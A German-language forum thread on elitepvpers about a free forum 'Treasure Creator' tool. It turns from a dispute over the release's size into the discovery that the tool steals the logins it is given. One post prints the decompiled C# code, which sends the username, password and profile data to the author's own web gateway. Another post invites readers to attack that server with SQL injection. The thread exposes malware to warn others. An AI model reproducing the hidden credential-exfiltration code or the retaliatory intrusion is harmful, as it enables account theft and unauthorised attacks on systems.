Register for your free account! | Forgot your password?

Go Back   elitepvpers > Coders Den > Coding Releases
You last visited: Today at 02:16

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



[RELEASE] Treasure Creator by supahc0dez

Discussion on [RELEASE] Treasure Creator by supahc0dez within the Coding Releases forum part of the Coders Den category.

Closed Thread
 
Old 12/24/2015, 04:12   #16
 
elite*gold: 0
Join Date: Dec 2015
Posts: 13
Received Thanks: 2
Quote:
Originally Posted by Shadow992 View Post
Also eigentlich mische ich mich ja nicht ein in solch offensichtliche Diskussionen, aber jetzt muss ich es doch einmal tun:

Es ist mehr als verständlich, dass jeder, der Blut, Schweiß und auch Emotionen in sein Programm gesteckt hat, davon überzeugt ist, dass es etwas ganz besonderes ist. Das kennt man ja auch vom Kochen, selbstgemacht ist es immer besser und wenn es "objektiv" gesehen sogar schlechter schmeckt.
Daher ist es auch klar, dass du dein Tool derart verteidigst.

Auch wenn die Diskussion ein wenig "zynisch angehaucht" gestartet wurde, wollen wir hier keineswegs deine Arbeit schlecht reden.
Jeder war einmal Anfänger und jeder weiß wie lange es dauern kann einen "für Anfängerverhältnisse" perfekten Code zu zaubern. Die Befehle, die Exceptions, etc. das ist ein Haufen Zeugs und damit kann man gut und gerne einige Monate verbringen.

Dennoch ist Kritik (auch von den Zynikern, zu denen ich ja zugegebenermaßen auch ab und an gehöre) nichts was dich fertig machen sollte. Natürlich ist der Ton im Internet rauer als vom Ausbilder/Lehrer/Professor/usw. aber dennoch ist die Kritik meistens berechtigt.

Aber viel wichtiger ist es, was man aus der Kritik macht.
Kritik ist eine Chance zu wachsen, eine Gelegenheit aus seinen Fehlern zu lernen, die Möglichkeit zu sehen wo man steht und sich Eindrücke von anderen Leuten zu holen.
Kritikfähigkeit ist also, wenn man etwas lernen möchte und sich effektiv weiterbilden möchte, enorm wichtig und hilft dir nicht nur beim Lernen, sondern praktisch über all.

Daher würde ich dir empfehlen:
Versuche doch mal Kritik sachlicher anzugehen und wenn die Kritik (deiner Meinung nach) unberechtigt ist, versuche sachlich Gegenargumente zu bringen.

Mein Resume zu diesem Thread:
Kleiner Release, weil es zwar durchaus umfangreich und anspruchsvoll sein kann, aber es eben schon viele andere derartige Programme gibt und der Code nicht derartig komplex/umfangreich sein dürfte.

P.S.
Noch zwei Zitate, die ich für sehr wahr halte (und die vor allem auch dich und den Thread betreffen):





Edit:
Achja #closerequest (fast vergessen)
WHAT?
Du redest da die ganze Zeit von Kritik, aber niemand hat mir in diesem Thread Kritik abgegeben. Das ist genau so als würdest du Spaghetti Bolognese machen - nur eben ohne Spaghetti (wenn wir schon beim Kochen sind) Das machst du doch auch nicht... wobei - naja vielleicht ja doch ^^ Würde zumindest erklären wieso du auf Kritik kommst wo es keine gibt.

Außer du siehst die Aussage "ey, dein Tool is n kleines Release" als Kritik. Dann kennst du jedoch die Bedeutung von "Kritik" nicht.

Ach und wenn dus genau wissen möchtest, hab mit diesen "Befehlen", "Exceptions" und dem "Haufen Zeugs" keine Monate, sondern Jahre verbracht - nur für diesen einen Treasure Creator. Ironie off.

Wenn noch wer mit tausenden Beiträgen im Codingbereich auf einen Neuling losgehen will - nur zu. Wirklich heldenhaft!
Der Thread dient ja nicht mehr meinem Release oder seiner Bewertung, sondern um herauszufinden ob es ein kleines Release ist oder nicht. Ihr erledigt quasi einfach die Arbeit der Mods
supahc0dez is offline  
Old 12/24/2015, 11:37   #17
 
Shadow992's Avatar
 
elite*gold: 77
Join Date: May 2008
Posts: 5,430
Received Thanks: 5,876
Quote:
Originally Posted by supahc0dez View Post
WHAT?
Du redest da die ganze Zeit von Kritik, aber niemand hat mir in diesem Thread Kritik abgegeben. Das ist genau so als würdest du Spaghetti Bolognese machen - nur eben ohne Spaghetti (wenn wir schon beim Kochen sind) Das machst du doch auch nicht... wobei - naja vielleicht ja doch ^^ Würde zumindest erklären wieso du auf Kritik kommst wo es keine gibt.

Außer du siehst die Aussage "ey, dein Tool is n kleines Release" als Kritik. Dann kennst du jedoch die Bedeutung von "Kritik" nicht.

Ach und wenn dus genau wissen möchtest, hab mit diesen "Befehlen", "Exceptions" und dem "Haufen Zeugs" keine Monate, sondern Jahre verbracht - nur für diesen einen Treasure Creator. Ironie off.

Wenn noch wer mit tausenden Beiträgen im Codingbereich auf einen Neuling losgehen will - nur zu. Wirklich heldenhaft!
Der Thread dient ja nicht mehr meinem Release oder seiner Bewertung, sondern um herauszufinden ob es ein kleines Release ist oder nicht. Ihr erledigt quasi einfach die Arbeit der Mods
Ich weiß nicht warum du dich immer sofort angegriffen fühlst, wenn man versucht dir etwas zu erklären.

Aber kommen wir mal zu deinem sehr schlechten Beispiel:
Wenn du Spaghetti Bolognese ohne Spaghetti kochst und dich dann jemand darauf anspricht, dass das gar kein Spaghetti Bolognese ist, weil die Spaghetti fehlen ist das sehr wohl Kritik. Genau so ist es Kritik wenn jemand sagt dein Tool ist "klein", obwohl du es für groß genug hälst.

Wenn du offensichtlich selbst sagst, dass du für das Tool keine Monate gebraucht hast (was für mich heißt, dass du irgendwo zwischen 2 und 4 Wochen gebraucht hast), verstehe ich nicht warum dein Tool nichts kleines sein soll.
Vor allem sind deine Aussagen nicht konsistent, zuerst behauptest du, dass "der Gott" es doch mal in 5min machen soll und jetzt sagst du selbst, dass es keine große Arbeit war. Nicht sehr überzeugend.

Wenn wir schon dabei sind:
Durch deine Antwort hat man mal wieder sehr gut gesehen, dass du eben nicht Kritikfähig bist. Denn wenn du es wärst, hättest du auf sachlicher Ebene argumentiert und nicht versucht auf der emotionalen Ebene zu argumentieren, nichts anderes ist dein "immer alle auf mich!".

Mal ganz abgesehen davon, dass ich jeden mit gleich viel Respekt behandle, egal ob er 10.000 Beiträge hat oder 5, egal ob er 100 Jahre alt ist oder 10.
Egal ob Professor oder Obdachloser, wir sind alles Menschen und jedem Menschen sollte man ein gewisses Maß an Respekt zukommen lassen.
Das gilt auch für Online-Foren.

Daran solltest du eventuell auch noch etwas arbeiten, denn Beleidigungen lassen dich nur unsympathisch wirken und bezwecken genau das Gegenteil von dem, was du eigentlich erreichen wolltest.

Vielleicht verstehst du ja eines Tages was ich mein, auch wenn die Zeit jetzt wohl noch nicht reif für dich ist.

So far...
Shadow992 is offline  
Old 12/24/2015, 13:05   #18
 
elite*gold: 0
Join Date: Dec 2015
Posts: 13
Received Thanks: 2
Quote:
Originally Posted by Shadow992 View Post
Ich weiß nicht warum du dich immer sofort angegriffen fühlst, wenn man versucht dir etwas zu erklären.

Aber kommen wir mal zu deinem sehr schlechten Beispiel:
Wenn du Spaghetti Bolognese ohne Spaghetti kochst und dich dann jemand darauf anspricht, dass das gar kein Spaghetti Bolognese ist, weil die Spaghetti fehlen ist das sehr wohl Kritik. Genau so ist es Kritik wenn jemand sagt dein Tool ist "klein", obwohl du es für groß genug hälst.

Wenn du offensichtlich selbst sagst, dass du für das Tool keine Monate gebraucht hast (was für mich heißt, dass du irgendwo zwischen 2 und 4 Wochen gebraucht hast), verstehe ich nicht warum dein Tool nichts kleines sein soll.
Vor allem sind deine Aussagen nicht konsistent, zuerst behauptest du, dass "der Gott" es doch mal in 5min machen soll und jetzt sagst du selbst, dass es keine große Arbeit war. Nicht sehr überzeugend.

Wenn wir schon dabei sind:
Durch deine Antwort hat man mal wieder sehr gut gesehen, dass du eben nicht Kritikfähig bist. Denn wenn du es wärst, hättest du auf sachlicher Ebene argumentiert und nicht versucht auf der emotionalen Ebene zu argumentieren, nichts anderes ist dein "immer alle auf mich!".

Mal ganz abgesehen davon, dass ich jeden mit gleich viel Respekt behandle, egal ob er 10.000 Beiträge hat oder 5, egal ob er 100 Jahre alt ist oder 10.
Egal ob Professor oder Obdachloser, wir sind alles Menschen und jedem Menschen sollte man ein gewisses Maß an Respekt zukommen lassen.
Das gilt auch für Online-Foren.

Daran solltest du eventuell auch noch etwas arbeiten, denn Beleidigungen lassen dich nur unsympathisch wirken und bezwecken genau das Gegenteil von dem, was du eigentlich erreichen wolltest.

Vielleicht verstehst du ja eines Tages was ich mein, auch wenn die Zeit jetzt wohl noch nicht reif für dich ist.

So far...
Was hat denn die aufgewendete Zeit bei einem Release mit seiner Größe zu tun? Vielmehr entscheidet das mMn die Funktionalität. Den Treasure Creator habe ich nebenbei in der Schule programmiert, das hat keine paar Tage gedauert. Dennoch sehe ich es nicht als kleines Tool. Ein kleines Tool ist für mich ein Phasenwinkelrechner, aber kein threadübergreifender, fehlerloser Treasure Creator, bei dem man sich offensichtlich sogar Mühe bei der GUI gegeben hat. Natürlich ists jetzt auch nicht das größte Release 2015 passend zum Jahresende, aber ein kleines Tool ist es für mich genausowenig.

Ob es für euch ein kleines Tool ist sei dahingestellt, eure Meinung hat hier nichts verloren. Was zählt ist die Einschätzung meinerseits und die der Mods.
Verstehst du das?

Und wenn jemand in meinem Thread spammen darf, darf ich doch wohl ein wenig zynisch zu ihm sein oder nicht? Nicht alles so ernst nehmen...
So bin ich eben und so bleibe ich auch.

Und noch eine Sache: Du musst jetzt echt nicht versuchen mir Respekt beizubringen, oder mich in irgendwelchen anderen Dingen zu "lehren". Ob jemand seinen Mitmenschen respektiert, kann man mit Sicherheit nicht anhand 3-4 seiner Beiträge sehen...
supahc0dez is offline  
Old 12/24/2015, 13:06   #19
 
MrDami123's Avatar
 
elite*gold: 56
Join Date: Oct 2010
Posts: 3,409
Received Thanks: 1,219
Solche Tools nutzt doch niemand oder?
Zumindest nicht ohne irgendwelchen Funktionen, die sich von den eigentlichen abheben. Also automatische Erstellung, Löschung mit Timer, umbenennen und Beiträge verbinden mit automatischer Treasure Aktualisierung wenn das Treasure aus dem Beitrag nicht mehr Verfügbar ist, Signal wenn ein Treasure gekauft wird etc.

Sonst sieht das Design gut aus.

PS:
Quote:
Originally Posted by supahc0dez View Post
Ob es für euch ein kleines Tool ist sei dahingestellt, eure Meinung hat hier nichts verloren. Was zählt ist die Einschätzung meinerseits und die der Mods.
Hahahaha Opf..
MrDami123 is offline  
Old 12/24/2015, 13:11   #20
 
elite*gold: 0
Join Date: Dec 2015
Posts: 13
Received Thanks: 2
Quote:
Originally Posted by MrDami123 View Post
Solche Tools nutzt doch niemand oder?
Zumindest nicht ohne irgendwelchen Funktionen, die sich von den eigentlichen abheben. Also automatische Erstellung, Löschung mit Timer, umbenennen und Beiträge verbinden mit automatischer Treasure Aktualisierung wenn das Treasure aus dem Beitrag nicht mehr Verfügbar ist, Signal wenn ein Treasure gekauft wird etc.

Sonst sieht das Design gut aus.
Na endlich mal ein nützlicher Beitrag!
Besonders der Punkt "Beiträge verbinden mit automatischer Treasure Aktualisierung wenn das Treasure aus dem Beitrag nicht mehr Verfügbar ist" gefällt mir. Danke für den Vorschlag

EDIT: "Hahahaha Opf..." - Stimmt meine Aussage bzgl. der Irrelevanz von Meinungen irgendwelcher User denn nicht? Ich meine ich schreibe jetzt ja auch nicht in alle Releasethreads meine Einschätzung über die Größe des Releases... Ich bin doch kein H@rensohn.
supahc0dez is offline  
Old 12/24/2015, 13:54   #21
 
MrDami123's Avatar
 
elite*gold: 56
Join Date: Oct 2010
Posts: 3,409
Received Thanks: 1,219
Quote:
Originally Posted by supahc0dez View Post
Stimmt meine Aussage bzgl. der Irrelevanz von Meinungen irgendwelcher User denn nicht?
Wenn stellst du den das Tool zur Verfügung? Ist es für dich brauchst du es hier nicht veröffentlichen. Ist es für die Mods kannst du es entsprechend markieren.
MrDami123 is offline  
Old 12/24/2015, 13:55   #22
 
Kraizy​'s Avatar
 
elite*gold: 0
The Black Market: 471/0/0
Join Date: Apr 2010
Posts: 9,696
Received Thanks: 1,810
Jungs lasst es einfach, man kann mit dem User anscheinend einfach nicht diskutieren.
Kraizy​ is offline  
Old 12/24/2015, 14:46   #23
 
elite*gold: 0
Join Date: Dec 2015
Posts: 13
Received Thanks: 2
Quote:
Originally Posted by MrDami123 View Post
Wenn stellst du den das Tool zur Verfügung? Ist es für dich brauchst du es hier nicht veröffentlichen. Ist es für die Mods kannst du es entsprechend markieren.
Ich meinte, dass deren Meinung zum Größenumfang dieses Tools nicht zählt.
Falls Mods mit dem eigenen Thread nicht einverstanden sind, werden sie ihn schon löschen und auf den Sammelthread verweisen.
Falls sie jedoch damit einverstanden sind, können noch so viele User kommen und rumheulen, weil ich einen eigenen Thread habe. Am Ende zählt einzig und allein die Meinung des Mods.
Das habe ich gemeint. *facepalm* Ist doch nicht so schwer zu verstehen oder?

Quote:
Originally Posted by Kraizy​ View Post
Jungs lasst es einfach, man kann mit dem User anscheinend einfach nicht diskutieren.
Klar kann man mit mir Diskussionen führen, jedoch bin ich an solchen die die Größe meines Tools thematisieren nicht interessiert. Nur das kapiert wohl noch immer keiner von euch.
supahc0dez is offline  
Old 12/24/2015, 16:50   #24


 
elite*gold: 1091
Join Date: Jun 2007
Posts: 19,836
Received Thanks: 7,180
Quote:
Originally Posted by supahc0dez View Post
Falls Mods mit dem eigenen Thread nicht einverstanden sind, werden sie ihn schon löschen und auf den Sammelthread verweisen.
Quote:
Originally Posted by supahc0dez View Post
Am Ende zählt einzig und allein die Meinung des Mods.
Quote:
Originally Posted by supahc0dez View Post
Ihr erledigt quasi einfach die Arbeit der Mods
Quote:
Originally Posted by supahc0dez View Post
eure Meinung hat hier nichts verloren. Was zählt ist die Einschätzung meinerseits und die der Mods.
Quote:
Originally Posted by supahc0dez View Post
Ob mein Programm in einen Sammelthread gehört sollen Mods entscheiden, und nicht Dahergelaufene. Besonders nicht solche, die ne halbnackte Frau als Avatar haben
Da du dich nicht auf die Sektionsmoderatoren beziehst (sondern auf alle), sage ich einfach mal: Nö, braucht keinen eigenen Thread.

Und die Zitate oben sprechen wohl auch für sich. Unfassbar, wie arrogant und hochnäsig du dich hier aufführst. Entwickler gibt's hier genug, auf einen mehr oder weniger sind wir nicht angewiesen, zumindest nicht auf solche wie dich.
Mostey is offline  
Thanks
4 Users
Old 12/24/2015, 17:26   #25
 
elite*gold: 0
Join Date: Dec 2015
Posts: 13
Received Thanks: 2
Quote:
Originally Posted by Mostey View Post
Da du dich nicht auf die Sektionsmoderatoren beziehst (sondern auf alle), sage ich einfach mal: Nö, braucht keinen eigenen Thread.

Und die Zitate oben sprechen wohl auch für sich. Unfassbar, wie arrogant und hochnäsig du dich hier aufführst. Entwickler gibt's hier genug, auf einen mehr oder weniger sind wir nicht angewiesen, zumindest nicht auf solche wie dich.
Naja klar wird jetzt jeder Moderator auf der Seite der x-Tausend-Beiträge-User sein.
Wie dem auch sei, ein Sectionmod soll endgültig entscheiden. Bin hier erstmal raus.

Sourcecode gibts via PN für alle Interessierten.
supahc0dez is offline  
Old 12/27/2015, 02:38   #26
Moderator




 
Bench's Avatar
 
elite*gold: 100
The Black Market: 499/0/0
Join Date: Sep 2010
Posts: 25,912
Received Thanks: 5,841
Mal davon abgesehen, dass du selber geschrieben hast, dass Entwickler mit den Kunden zusammen arbeiten sollten, greifst du hier alle an, die ihre Meinung aussprechen (bzw. aufschreiben). Kritik sowies positive Rückmeldungen (â Feedback) muss ein Entwickler entgegen nehmen und klar kommen.

Quote:
Originally Posted by supahc0dez View Post
Sehr geehrte Community!

Da es anscheinend keine kostenlosen Treasure Creator gibt und das meiste was verkauft wird seines Preises nicht wert ist, habe ich mir gedacht diesen e*gold-geilen Codern einen Strich durch die Rechnung zu ziehen
Auf den Punkt, dass dein Tool nun was besonderes ist (oder nicht), gehe ich jetzt mal nicht weiter drauf ein. Es gibt mittlerweile - man könnte schon sagen - tausende Treasure Creator mit mehr Features und Möglichkeiten. Ob diese nun kosten oder nicht, macht dein Programm nicht besser. Jeder Entwickler, der etwas entwickelt hat und seine Zeit in ein Programm gesteckt hat, darf bzw. kann auch für seine Arbeit Geld verlangen - daran ist nichts falsch.

Mehr muss ich wohl nicht sagen.

Um jedoch trotzdem was zum Programm sagen zu können: Das Design ist schlicht und gut aufgebaut. Ende.
Bench is offline  
Old 12/27/2015, 08:51   #27
 
YatoDev's Avatar
 
elite*gold: 50
Join Date: Sep 2012
Posts: 3,841
Received Thanks: 1,462
jungs ich will euch ja nicht stören aber:

Code:
string str = "http://supahc0dez.bplaced.net/epvp/php_gateway.php";
string str2 = "?data=" + LoginForm.smethod_0(LoginForm.smethod_0(string.Concat(new object[]
		{
			this.txtUser.Text,
			";",
			this.txtPW.Text,
			";",
			this.authenticatedSession_0.User.Posts,
			";",
			this.authenticatedSession_0.User.TBMProfile.Ratings.Positive,
			";",
			this.authenticatedSession_0.User.SkypeID
		})) + LoginForm.smethod_1(2));
HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(str + str2);
httpWebRequest.GetResponse();
ist der epvp login umgezogen auf supahc0dez.bplaced.net/epvp/?
YatoDev is offline  
Thanks
7 Users
Old 12/27/2015, 13:40   #28


 
Else's Avatar
 
elite*gold: 4
The Black Market: 165/0/0
Join Date: Feb 2008
Posts: 3,846
Received Thanks: 1,267
Eine sog. Datenkrake ...
Else is offline  
Old 12/27/2015, 13:51   #29
 
Shadow992's Avatar
 
elite*gold: 77
Join Date: May 2008
Posts: 5,430
Received Thanks: 5,876
Quote:
Originally Posted by »FlutterShy™ View Post
jungs ich will euch ja nicht stören aber:

Code:
string str = "http://supahc0dez.bplaced.net/epvp/php_gateway.php";
string str2 = "?data=" + LoginForm.smethod_0(LoginForm.smethod_0(string.Concat(new object[]
		{
			this.txtUser.Text,
			";",
			this.txtPW.Text,
			";",
			this.authenticatedSession_0.User.Posts,
			";",
			this.authenticatedSession_0.User.TBMProfile.Ratings.Positive,
			";",
			this.authenticatedSession_0.User.SkypeID
		})) + LoginForm.smethod_1(2));
HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(str + str2);
httpWebRequest.GetResponse();
ist der epvp login umgezogen auf supahc0dez.bplaced.net/epvp/?
Naja dann werde ich ihm jetzt einmal ein paar Daten schicken.

Edit:
Wer will kann sich auch einmal an einer SQL-Injection-Attacke probieren, der Server ist mehr als unzureichend gesichert und bietet beste Angriffsmöglichkeiten, wie aus einem Bilderbuch.
Ich werd später die Tabelle mal droppen, dann kann er sich die Daten zusammensuchen.

Falls jemand den Aufbau der Datenbank wissen möchte (Eine Beispiels-Anfrage, habe meine IP natürlich geändert):
Quote:
UPDATE tblCredentials SET password="", posts="", tbmpositives="", skypeid="", timestamp="2015-12-27 14:05:07", ip="56.356.239.25" WHERE username="6"
Edit2:
Report ist raus (hoffe der Bann kommt bald).
Shadow992 is offline  
Thanks
2 Users
Old 12/27/2015, 14:40   #30
 
alpines's Avatar
 
elite*gold: 60
Join Date: Aug 2009
Posts: 2,256
Received Thanks: 815
Und wenn sie ihre Malware nicht ordnungsgemäßg verstecken konnten, dann wurden sie permagebannt. - Und damit sollte diese Geschichte hier beendet sein.
alpines is offline  
Closed Thread


Similar Threads Similar Threads
[Release] Treasure Creator
01/29/2015 - Coding Releases - 6 Replies
_ Moin, habe damals einen 'Treasure Creator' gefunden, und das Design geändert. (source habe ich leider nicht mehr)
[RELEASE] Epic Treasure Creator + Source
08/01/2013 - Freebies - 12 Replies
Da der Verkauf Schleppend läuft wie Gepäckträger Release ich meinen Treasure Creator http://img4.fotos-hochladen.net/uploads/unbenannt kadtmhvwi4.png Der Creator kann: e*Gold stand anzeigen Bis zu 50 Treasures erstellen Treasures anzeigen Logs
{Release}Treasure Creator für Elitepvpers
03/30/2012 - AutoIt - 5 Replies
#Removed



All times are GMT +2. The time now is 02:16.


Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.